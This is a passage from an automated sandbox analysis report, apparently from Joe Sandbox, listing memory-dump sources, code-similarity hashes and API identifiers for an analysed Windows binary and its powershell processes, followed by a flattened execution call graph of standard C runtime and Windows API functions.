• Associated: 00000000.00000002.1949841545.0000000140022000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_140000000_file.jbxd
Similarity
• API ID: Heapwcsncpy$AllocFree
• String ID:
• API String ID: 1479455602-0
• Opcode ID: bd39aa7686407ba85d86bffb32f51c5ca4b87867d279337be1c8d10c74bedb84
• Instruction ID: 28fd82db213d89e843f0df720333d3fbeca218ccf85cb71e10007619eb34b75b
• Opcode Fuzzy Hash: bd39aa7686407ba85d86bffb32f51c5ca4b87867d279337be1c8d10c74bedb84
• Instruction Fuzzy Hash: BF51A0B2B0068486EA66DF26A404BEA67E1F789BD4F588125EF4D477E5EB3CC542C300
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.1948364795.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
• Associated: 00000000.00000002.1948211369.0000000140000000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1949265802.0000000140018000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1949789300.000000014001F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1949841545.0000000140022000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_140000000_file.jbxd
Similarity
• API ID: memmove
• String ID: $ $invalid stored block lengths
• API String ID: 2162964266-1718185709
• Opcode ID: 5a154506d4633e528a7a17bae092f7a518f978704b3b8509104772513ba27d3c
• Instruction ID: 754f218cd566fbce8dd602483dcb0b6cf2df6dd41c0e80f26ad42ee7a9f80f3a
• Opcode Fuzzy Hash: 5a154506d4633e528a7a17bae092f7a518f978704b3b8509104772513ba27d3c
• Instruction Fuzzy Hash: 3A417B766006508BE7268F27D5887AE3BA0F3087C8F155119FF8A4BBA4C776D8A1CB40
APIs
Memory Dump Source
• Source File: 00000000.00000002.1948364795.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
• Associated: 00000000.00000002.1948211369.0000000140000000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1949265802.0000000140018000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1949789300.000000014001F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1949841545.0000000140022000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_140000000_file.jbxd
Similarity
• API ID: EntryFunctionLookup$UnwindVirtual
• String ID:
• API String ID: 3286588846-0
• Opcode ID: a43c6ac0d422a0cb868a81bf0a3177776bf41fbc22bf78c230eac44af0668553
• Instruction ID: 3ebace1c390976f506d0f99ca18ed721a427f0b26ede3763bfd5663c46823d1b
• Opcode Fuzzy Hash: a43c6ac0d422a0cb868a81bf0a3177776bf41fbc22bf78c230eac44af0668553
• Instruction Fuzzy Hash: 48512E66A15FC481EA61CB29E5453ED63A0FB9DB84F09A215DF8C13756EF34D2D4C700
APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1948364795.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1948211369.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1949265802.0000000140018000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1949789300.000000014001F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1949841545.0000000140022000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_140000000_file.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CharLower
                                                                                                            • String ID:
                                                                                                            • API String ID: 1615517891-0
                                                                                                            • Opcode ID: c79849e46724dc2abb30ea88d6992f20c8495c80adfb737506759087bbbff476
                                                                                                            • Instruction ID: 89447f37e157e5f910190f26039f07b44efb98263a832e051549732566d91b47
                                                                                                            • Opcode Fuzzy Hash: c79849e46724dc2abb30ea88d6992f20c8495c80adfb737506759087bbbff476
                                                                                                            • Instruction Fuzzy Hash: BB2181766006A092EA66EF13A8047BA76A0F748BF5F5A4211FFD5072E0DB35C495D710
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1948364795.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1948211369.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1949265802.0000000140018000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1949789300.000000014001F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1949841545.0000000140022000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_140000000_file.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ByteCharMultiWidemalloc
                                                                                                            • String ID:
                                                                                                            • API String ID: 2735977093-0
                                                                                                            • Opcode ID: 0f974c86f1a7e361068b693f653777688ae97df7ee1888e934fdd283249f1d8a
                                                                                                            • Instruction ID: 84a502ef329111f45b75735ee98b05bbb8abde518fb530cc481733cdeaf2302d
                                                                                                            • Opcode Fuzzy Hash: 0f974c86f1a7e361068b693f653777688ae97df7ee1888e934fdd283249f1d8a
                                                                                                            • Instruction Fuzzy Hash: 76216532608B8086D725CF56B44079AB7A5F7887D4F088325FF9917BA9DF3DC5529700
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1948364795.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1948211369.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1949265802.0000000140018000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1949789300.000000014001F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1949841545.0000000140022000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_140000000_file.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: FolderFreeFromListLocationPathTaskwcslen
                                                                                                            • String ID:
                                                                                                            • API String ID: 4012708801-0
                                                                                                            • Opcode ID: 47ccaf1a7f74cd3e733cb6c5cd31dbbbe8972a233b29932fb87548b6fe9d3e17
                                                                                                            • Instruction ID: 658b845125df41e3d707b834e255611bbe4f6e958313e82604e3ea1cd6ed1d71
                                                                                                            • Opcode Fuzzy Hash: 47ccaf1a7f74cd3e733cb6c5cd31dbbbe8972a233b29932fb87548b6fe9d3e17
                                                                                                            • Instruction Fuzzy Hash: 50016972314A5092E7219B26A5807AAA3B4FB88BC0F548026EB4987774DF3AC8528300
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1948364795.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1948211369.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1949265802.0000000140018000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1949789300.000000014001F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1949841545.0000000140022000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_140000000_file.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AllocCriticalHeapSection$EnterLeave
                                                                                                            • String ID:
                                                                                                            • API String ID: 830345296-0
                                                                                                            • Opcode ID: 38d32e320765f0e197812c7802676496a175ef663a849a6793450ef0177ea7f4
                                                                                                            • Instruction ID: a4d5f086a96e389f2db612197d0023b8b07f868559dabceebcf4944cd54701ff
                                                                                                            • Opcode Fuzzy Hash: 38d32e320765f0e197812c7802676496a175ef663a849a6793450ef0177ea7f4
                                                                                                            • Instruction Fuzzy Hash: 47513A72601B44C7EB5ACF26E18039873A5F78CF88F188526EB4E4B766DB35D4A1C750
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1948364795.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1948211369.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1949265802.0000000140018000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1949789300.000000014001F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1949841545.0000000140022000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_140000000_file.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AllocHeapmemsetwcscpywcslen
                                                                                                            • String ID:
                                                                                                            • API String ID: 1807340688-0
                                                                                                            • Opcode ID: d18a2de789b4fced0d5c5c7af7bdf7f4ac513c7a43bb144637d931b1f82fec87
                                                                                                            • Instruction ID: 2291175711b854bc4f74fb4265d0f1bd771c1a5bff4f4550b8324bf1b1149364
                                                                                                            • Opcode Fuzzy Hash: d18a2de789b4fced0d5c5c7af7bdf7f4ac513c7a43bb144637d931b1f82fec87
                                                                                                            • Instruction Fuzzy Hash: DA3129B1605B4081EB16EF27A5443ECB7A1EB8CFD4F588126AF4D0B7AADF39C4518351
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1948364795.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1948211369.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1949265802.0000000140018000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1949789300.000000014001F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1949841545.0000000140022000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_140000000_file.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Heap$Free$Alloc
                                                                                                            • String ID:
                                                                                                            • API String ID: 3901518246-0
                                                                                                            • Opcode ID: bb233ee99204156f9138ca45554c95eaa539cc3d4f2a2cc436c5bedac0f56ea0
                                                                                                            • Instruction ID: 7f7b652e9f7b58be947c1c734e7a82da3d99598ff0fb71c13e03353473737a2d
                                                                                                            • Opcode Fuzzy Hash: bb233ee99204156f9138ca45554c95eaa539cc3d4f2a2cc436c5bedac0f56ea0
                                                                                                            • Instruction Fuzzy Hash: 063142B2211B409BE702DF13EA807A937A4F78CBD0F448429EB4847B65DF79E4A6C740
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1948364795.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1948211369.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1949265802.0000000140018000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1949789300.000000014001F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1949841545.0000000140022000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_140000000_file.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AllocCriticalHeapSection$EnterLeave
                                                                                                            • String ID:
                                                                                                            • API String ID: 830345296-0
                                                                                                            • Opcode ID: 0174f44eaa2d8e27a3169ce146a30e111c1709516ab2c2556cb9a7121bcdce25
                                                                                                            • Instruction ID: 37e1212d5150fef44f5374ae18cee5b2af0a62904f946070966fd9e2c84ce28f
                                                                                                            • Opcode Fuzzy Hash: 0174f44eaa2d8e27a3169ce146a30e111c1709516ab2c2556cb9a7121bcdce25
                                                                                                            • Instruction Fuzzy Hash: 7B210872615B4482EB198F66E5403EC6361F78CFD4F548612EB6E4B7AACF38C552C350
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1948364795.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1948211369.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1949265802.0000000140018000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1949789300.000000014001F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1949841545.0000000140022000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_140000000_file.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ByteCharMultiWidemalloc
                                                                                                            • String ID:
                                                                                                            • API String ID: 2735977093-0
                                                                                                            • Opcode ID: 340bc02c17e4a8e241ea194c94348a7795e75439271f92f6ed283f878bcb1d35
                                                                                                            • Instruction ID: 61c3440d716b3c64d08436ee48054615140ae5ecb8d8084460387f48d4e9dd56
                                                                                                            • Opcode Fuzzy Hash: 340bc02c17e4a8e241ea194c94348a7795e75439271f92f6ed283f878bcb1d35
                                                                                                            • Instruction Fuzzy Hash: BB11C13260878082EB25CF26B41076AB7A4FB89BE4F140328EF9D57BE5DF39C0118704
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1948364795.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1948211369.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1949265802.0000000140018000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1949789300.000000014001F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1949841545.0000000140022000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_140000000_file.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CriticalFreeHeapSection$EnterLeave
                                                                                                            • String ID:
                                                                                                            • API String ID: 1298188129-0
                                                                                                            • Opcode ID: 5595f30b4037b9aa6adac2c161615a39573475ea320742baef4c0fe7d259a659
                                                                                                            • Instruction ID: 5186432533761a1e63310800083548d259c5d54e134ea9fda60ce401f62d664d
                                                                                                            • Opcode Fuzzy Hash: 5595f30b4037b9aa6adac2c161615a39573475ea320742baef4c0fe7d259a659
                                                                                                            • Instruction Fuzzy Hash: 76114C76600B4082EB5A9F53E5943E823A0FB9CBC5F4C8416EB091B6A7DF3AC4A5C300
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1948364795.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1948211369.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1949265802.0000000140018000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1949789300.000000014001F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1949841545.0000000140022000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_140000000_file.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: FreeHeap$CriticalSection$EnterLeavememset
                                                                                                            • String ID:
                                                                                                            • API String ID: 4254243056-0
                                                                                                            • Opcode ID: 2bfe007ce864aac335da932a328f28b9e5c2ec482aeaf7599142f2e4e3f2ebe6
                                                                                                            • Instruction ID: bd40ed23f28c7418c8be6727045953eb2e8c2f29468db0d1e18b21a18f306043
                                                                                                            • Opcode Fuzzy Hash: 2bfe007ce864aac335da932a328f28b9e5c2ec482aeaf7599142f2e4e3f2ebe6
                                                                                                            • Instruction Fuzzy Hash: FD01C8B5600B8492EB06EB63E9903E923A1FBCDBD0F488416AF0D1B776CF39D4518740
                                                                                                            Memory Dump Source
• Source File: 00000007.00000002.1828485306.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_7ffd9b890000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
• Instruction ID: 5b86534c8524b0afe59b57662357e645227b18a14a5c8e3dcc67305ce5c1f501
• Opcode Fuzzy Hash: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
• Instruction Fuzzy Hash: D001677121CB0D8FDB48EF0CE451AA6B7E0FB99364F10056DE58AC36A5D636E882CB45
Memory Dump Source
• Source File: 0000000C.00000002.1943963144.00007FFD9B980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B980000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_7ffd9b980000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 03512dd59b8a4eb54d8985431c059dea1b530c3139e98f17625ba63182929a5a
• Instruction ID: a4d56880ae6862f7613a493bbae7d0e9db10927cce82d8a49ce27b2652a7fdfd
• Opcode Fuzzy Hash: 03512dd59b8a4eb54d8985431c059dea1b530c3139e98f17625ba63182929a5a
• Instruction Fuzzy Hash: C6422622B1EE8D5FE7A69B6C48746B57BE1EF56710B0901FBD08CC71A3DA28AD05C341
Memory Dump Source
• Source File: 0000000C.00000002.1943963144.00007FFD9B980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B980000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_7ffd9b980000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: e2f9f1b46c1b922d61cf8cd9f76fe741ca7a1e5b335fa67215688aaf182c9adc
• Instruction ID: 1909b8f181cfcf7f234dafd4203ed843a548fdc6c813cfb2f86ea3643de21d70
• Opcode Fuzzy Hash: e2f9f1b46c1b922d61cf8cd9f76fe741ca7a1e5b335fa67215688aaf182c9adc
• Instruction Fuzzy Hash: 84410632B2DE1E5FF7B8975C74275B973D1EF88224B45027BD44EC35A6DE38A9024281
Memory Dump Source
• Source File: 0000000C.00000002.1943963144.00007FFD9B980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B980000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_7ffd9b980000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 4eae611e077b75bc28eda47b51d16390b41cb8a7312f2d0b33c30607508474de
• Instruction ID: 45b54e0a4620f5f5e7686209586a910073c158501751a56b15f86e2961f89e05
• Opcode Fuzzy Hash: 4eae611e077b75bc28eda47b51d16390b41cb8a7312f2d0b33c30607508474de
• Instruction Fuzzy Hash: B511E922F2ED2E5BF3B8935C74771B923C2EF88218B460276E41DC35A5DE3C6D420182
Memory Dump Source
• Source File: 0000000C.00000002.1943963144.00007FFD9B980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B980000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_7ffd9b980000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 393d637499f237338628550ae9598cbd5b2989a2cfcf9ee52db8b5090fdb2560
• Instruction ID: bcd0ba01004ec27e20eb5432c0b8f4f80e87c0b42c42bb73b9cce2b9277973ba
• Opcode Fuzzy Hash: 393d637499f237338628550ae9598cbd5b2989a2cfcf9ee52db8b5090fdb2560
• Instruction Fuzzy Hash: 4201DB22F2FD1E1BF7B8935C143467956C2DF84B61F5540BAD40DC3596DE189C014381
Memory Dump Source
• Source File: 0000000C.00000002.1943963144.00007FFD9B980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B980000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_7ffd9b980000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 803d70b779626e71b73a8d04ae23513870f50c65f222dd16f648191229e8223f
• Instruction ID: 5ef266a86ff8ad2c3676219ad5fe1f3df442a27d225ecbdd4726e2b41fe1fcd2
• Opcode Fuzzy Hash: 803d70b779626e71b73a8d04ae23513870f50c65f222dd16f648191229e8223f
• Instruction Fuzzy Hash: CAE0D833F0EC2D5FEBB5E6AC28391F86380DF54A2170501B7E91CD3191ED149C114391

Execution Graph

Execution Coverage: 4.2%
Dynamic/Decrypted Code Coverage: 0%
Signature Coverage: 17.6%
Total number of Nodes: 2000
Total number of Limit Nodes: 46
3246ad _free 66 API calls 18256->18257 18258 32ce46 18257->18258 18259 3246ad _free 66 API calls 18258->18259 18260 32ce4e 18259->18260 18261 3246ad _free 66 API calls 18260->18261 18262 32ce56 18261->18262 18263 3246ad _free 66 API calls 18262->18263 18264 32ce61 18263->18264 18265 3246ad _free 66 API calls 18264->18265 18266 32ce69 18265->18266 18267 3246ad _free 66 API calls 18266->18267 18268 32ce71 18267->18268 18269 3246ad _free 66 API calls 18268->18269 18270 32ce79 18269->18270 18271 3246ad _free 66 API calls 18270->18271 18272 32ce81 18271->18272 18273 3246ad _free 66 API calls 18272->18273 18274 32ce89 18273->18274 18275 3246ad _free 66 API calls 18274->18275 18276 32ce91 18275->18276 18277 3246ad _free 66 API calls 18276->18277 18278 32ce99 18277->18278 18279 3246ad _free 66 API calls 18278->18279 18280 32cea1 18279->18280 18281 3246ad _free 66 API calls 18280->18281 18282 32cea9 18281->18282 18283 3246ad _free 66 API calls 18282->18283 18284 32ceb1 18283->18284 18285 3246ad _free 66 API calls 18284->18285 18402->18143 18406 32c64c LeaveCriticalSection 18403->18406 18405 328bfc 18405->18121 18406->18405 18408 328e6f _raise 18407->18408 18409 3281be __getptd 66 API calls 18408->18409 18410 328e78 18409->18410 18411 328b5a _LocaleUpdate::_LocaleUpdate 68 API calls 18410->18411 18412 328e82 18411->18412 18438 328bfe 18412->18438 18415 32c14e __malloc_crt 66 API calls 18416 328ea3 18415->18416 18417 328fc2 _raise 18416->18417 18445 328c7a 18416->18445 18417->18081 18420 328ed3 InterlockedDecrement 18422 328ee3 18420->18422 18423 328ef4 InterlockedIncrement 18420->18423 18421 328fcf 18421->18417 18425 328fe2 18421->18425 18426 3246ad _free 66 API calls 18421->18426 18422->18423 18428 3246ad _free 66 API calls 18422->18428 18423->18417 18424 328f0a 18423->18424 18424->18417 18429 32c725 __lock 66 API calls 18424->18429 18427 3272de __fptostr 66 API calls 18425->18427 18426->18425 18427->18417 18430 328ef3 18428->18430 18432 328f1e InterlockedDecrement 
18429->18432 18430->18423 18433 328f9a 18432->18433 18434 328fad InterlockedIncrement 18432->18434 18433->18434 18436 3246ad _free 66 API calls 18433->18436 18455 328fc4 18434->18455 18437 328fac 18436->18437 18437->18434 18439 324404 _LocaleUpdate::_LocaleUpdate 76 API calls 18438->18439 18440 328c12 18439->18440 18441 328c3b 18440->18441 18442 328c1d GetOEMCP 18440->18442 18443 328c40 GetACP 18441->18443 18444 328c2d 18441->18444 18442->18444 18443->18444 18444->18415 18444->18417 18446 328bfe getSystemCP 78 API calls 18445->18446 18447 328c9a 18446->18447 18448 328ca5 setSBCS 18447->18448 18451 328ce9 IsValidCodePage 18447->18451 18453 328d0e _memset __setmbcp_nolock 18447->18453 18449 327fff __setmbcp_nolock 5 API calls 18448->18449 18450 328e61 18449->18450 18450->18420 18450->18421 18451->18448 18452 328cfb GetCPInfo 18451->18452 18452->18448 18452->18453 18458 3289ca GetCPInfo 18453->18458 18519 32c64c LeaveCriticalSection 18455->18519 18457 328fcb 18457->18417 18460 3289fe _memset 18458->18460 18467 328ab2 18458->18467 18468 32cd86 18460->18468 18462 327fff __setmbcp_nolock 5 API calls 18464 328b58 18462->18464 18464->18453 18466 32cc59 ___crtLCMapStringA 82 API calls 18466->18467 18467->18462 18469 324404 _LocaleUpdate::_LocaleUpdate 76 API calls 18468->18469 18470 32cd99 18469->18470 18478 32cc9f 18470->18478 18473 32cc59 18474 324404 _LocaleUpdate::_LocaleUpdate 76 API calls 18473->18474 18475 32cc6c 18474->18475 18495 32ca72 18475->18495 18479 32ccc8 MultiByteToWideChar 18478->18479 18480 32ccbd 18478->18480 18483 32ccf5 18479->18483 18490 32ccf1 18479->18490 18480->18479 18481 32cd0a _memset __crtLCMapStringA_stat 18485 32cd43 MultiByteToWideChar 18481->18485 18481->18490 18482 327fff __setmbcp_nolock 5 API calls 18484 328a6d 18482->18484 18483->18481 18486 324619 _malloc 66 API calls 18483->18486 18484->18473 18487 32cd6a 18485->18487 18488 32cd59 GetStringTypeW 18485->18488 18486->18481 18491 32ca52 18487->18491 18488->18487 18490->18482 18492 32ca6f 
18491->18492 18493 32ca5e 18491->18493 18492->18490 18493->18492 18494 3246ad _free 66 API calls 18493->18494 18494->18492 18497 32ca90 MultiByteToWideChar 18495->18497 18498 32caee 18497->18498 18500 32caf5 18497->18500 18499 327fff __setmbcp_nolock 5 API calls 18498->18499 18502 328a8d 18499->18502 18503 324619 _malloc 66 API calls 18500->18503 18509 32cb0e __crtLCMapStringA_stat 18500->18509 18501 32cb42 MultiByteToWideChar 18504 32cc3a 18501->18504 18505 32cb5b LCMapStringW 18501->18505 18502->18466 18503->18509 18506 32ca52 __freea 66 API calls 18504->18506 18505->18504 18507 32cb7a 18505->18507 18506->18498 18508 32cb84 18507->18508 18512 32cbad 18507->18512 18508->18504 18510 32cb98 LCMapStringW 18508->18510 18509->18498 18509->18501 18510->18504 18511 32cbfc LCMapStringW 18513 32cc12 WideCharToMultiByte 18511->18513 18514 32cc34 18511->18514 18515 32cbc8 __crtLCMapStringA_stat 18512->18515 18516 324619 _malloc 66 API calls 18512->18516 18513->18514 18517 32ca52 __freea 66 API calls 18514->18517 18515->18504 18515->18511 18516->18515 18517->18504 18519->18457 18521 3288e6 18520->18521 18522 3288ed 18520->18522 18521->18522 18527 32890b 18521->18527 18523 3272de __fptostr 66 API calls 18522->18523 18524 3288f2 18523->18524 18525 32728c __fptostr 11 API calls 18524->18525 18526 3288fc 18525->18526 18526->17829 18527->18526 18528 3272de __fptostr 66 API calls 18527->18528 18528->18524 18530 32c131 EncodePointer 18529->18530 18530->18530 18531 32c14b 18530->18531 18531->17843 18535 328756 18532->18535 18534 32879f 18534->17845 18536 328762 _raise 18535->18536 18543 329438 18536->18543 18542 328783 _raise 18542->18534 18544 32c725 __lock 66 API calls 18543->18544 18545 328767 18544->18545 18546 32866f DecodePointer DecodePointer 18545->18546 18547 32871e 18546->18547 18548 32869d 18546->18548 18557 32878c 18547->18557 18548->18547 18560 32c8c7 18548->18560 18550 328701 EncodePointer EncodePointer 18550->18547 18551 3286af 18551->18550 18553 3286d3 18551->18553 
18567 32c1df 18551->18567 18553->18547 18554 32c1df __realloc_crt 70 API calls 18553->18554 18556 3286ef EncodePointer 18553->18556 18555 3286e9 18554->18555 18555->18547 18555->18556 18556->18550 18593 329441 18557->18593 18561 32c8d2 18560->18561 18562 32c8e7 HeapSize 18560->18562 18563 3272de __fptostr 66 API calls 18561->18563 18562->18551 18564 32c8d7 18563->18564 18565 32728c __fptostr 11 API calls 18564->18565 18566 32c8e2 18565->18566 18566->18551 18571 32c1e8 18567->18571 18569 32c227 18569->18553 18570 32c208 Sleep 18570->18571 18571->18569 18571->18570 18572 32e464 18571->18572 18573 32e47a 18572->18573 18574 32e46f 18572->18574 18576 32e482 18573->18576 18585 32e48f 18573->18585 18575 324619 _malloc 66 API calls 18574->18575 18577 32e477 18575->18577 18578 3246ad _free 66 API calls 18576->18578 18577->18571 18592 32e48a _free 18578->18592 18579 32e4c7 18580 3287b8 _malloc DecodePointer 18579->18580 18582 32e4cd 18580->18582 18581 32e497 HeapReAlloc 18581->18585 18581->18592 18583 3272de __fptostr 66 API calls 18582->18583 18583->18592 18584 32e4f7 18587 3272de __fptostr 66 API calls 18584->18587 18585->18579 18585->18581 18585->18584 18586 3287b8 _malloc DecodePointer 18585->18586 18589 32e4df 18585->18589 18586->18585 18588 32e4fc GetLastError 18587->18588 18588->18592 18590 3272de __fptostr 66 API calls 18589->18590 18591 32e4e4 GetLastError 18590->18591 18591->18592 18592->18571 18596 32c64c LeaveCriticalSection 18593->18596 18595 328791 18595->18542 18596->18595 18600 318134 18597->18600 18634 301036 18597->18634 18598 3181f6 LoadLibraryW 18605 318211 18598->18605 18598->18634 18599 3181b1 